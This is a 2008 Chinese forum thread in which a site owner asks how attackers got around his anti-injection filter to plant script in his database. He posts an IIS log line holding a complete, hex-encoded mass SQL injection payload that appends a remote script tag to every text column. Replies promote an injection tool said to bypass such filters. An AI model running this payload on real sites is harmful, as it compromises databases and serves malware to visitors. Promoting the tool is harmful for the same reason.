返回列表 发帖
s37su37

Rank: 5Rank: 5

帖子
251 
积分
667 
威望
1075  
金钱
829  
在线时间
2 小时 
1 跳转到 » 倒序看帖
打印
tT
发表于 2008-7-21 00:18 | 只看该作者

[讨论]最近流行的数据库挂马方式讨论?

数据库, 讨论

[讨论]最近流行的数据库挂马方式讨论?
很多站被黑.挂了
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D
这么一句,大家可以google上下,

还原</title>"><scrip</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!


我抓的IIS的日志
---------- EX080518.LOG
2008-05-18 00:02:13 W3SVC337328992 125.76.230.26 GET /co/mb/pdview.asp pdid=59294;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 211.99.31.176 Mozilla/4.0 200 0 1236


很奇怪,为什么加了防注脚本,对这些危险的字符都过滤了,而且自己也测试了无法成功, 这个是怎么插入的,?
收藏 分享

dahuzi3938

Rank: 1

帖子
18 
积分
27 
威望
36  
金钱
31  
在线时间
0 小时 
2
发表于 2008-7-21 00:18 | 只看该作者
我也想知道用什么办法解决,不过一般都是把注入点找出来,然后sql限制比较好
帖子2 精华0 积分2 阅读权限40 在线时间1 小时 注册时间2008-6-2 最后登录2008-7-12 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

憶楓
晶莹剔透§烈日灼然

TOP

TOABY

Rank: 1

帖子
12 
积分
18 
威望
24  
金钱
21  
在线时间
0 小时 
3
发表于 2008-7-21 00:18 | 只看该作者
最近好象出了新的饿注入软件 可以突破防注入程序
管中窥豹 注入工具 http://gzkb.goomoo.cn

你们可以去看看
帖子14 精华0 积分41 阅读权限40 在线时间4 小时 注册时间2007-4-17 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

viva88
晶莹剔透§烈日灼然

TOP

zhangjian950617

Rank: 1

帖子
积分
12 
威望
17  
金钱
13  
在线时间
0 小时 
4
发表于 2008-7-21 00:18 | 只看该作者
请问哪里有管中窥豹下载呢.呵呵.
帖子2 精华0 积分2 阅读权限40 在线时间1 小时 注册时间2008-6-2 最后登录2008-7-12 查看详细资料引用 报告 回复 TOP

风尘秀吉
晶莹剔透§烈日灼然

TOP

风筝

Rank: 1

帖子
积分
威望
8  
金钱
8  
在线时间
0 小时 
5
发表于 2008-7-21 00:18 | 只看该作者
不知道那个管中窥豹有没后门和绑马
如果没有 实为大作
帖子18 精华0 积分44 阅读权限40 在线时间137 小时 注册时间2008-3-5 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

fhod
运维管理组

TOP

史达比克

Rank: 1

帖子
18 
积分
27 
威望
36  
金钱
32  
在线时间
0 小时 
6
发表于 2008-7-21 00:18 | 只看该作者
引用:
原帖由 憶楓 于 2008-6-3 05:55 发表
最近好象出了新的饿注入软件 可以突破防注入程序
管中窥豹 注入工具 http://gzkb.goomoo.cn

你们可以去看看
在此我顺便在这里把【管中窥豹】的加密方式简单说一说:【管中窥豹】同时采取了网络验证和usb加密锁双重验证的方式。网络验证采用了多线程互相监守、多线程随即认证、动态数据包加密、反本地模拟服务器等多种技术;usb加密则把软件的重要功能放到usb加密锁中运行,没有加密锁则缺失这些功能;此外还加上数个猛壳、字符串加密、CRC校验、反脱壳等等,要破解,几乎是不可能的任务。

共享软件很容易被破解倒是真的。

我想破解版大概会在2050年上市吧。  

  
作者: 古木系统安全

牛人哇..这也太牛比了...没准哪天就让人破了处

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

攻击者
晶莹剔透§烈日灼然

TOP

返回列表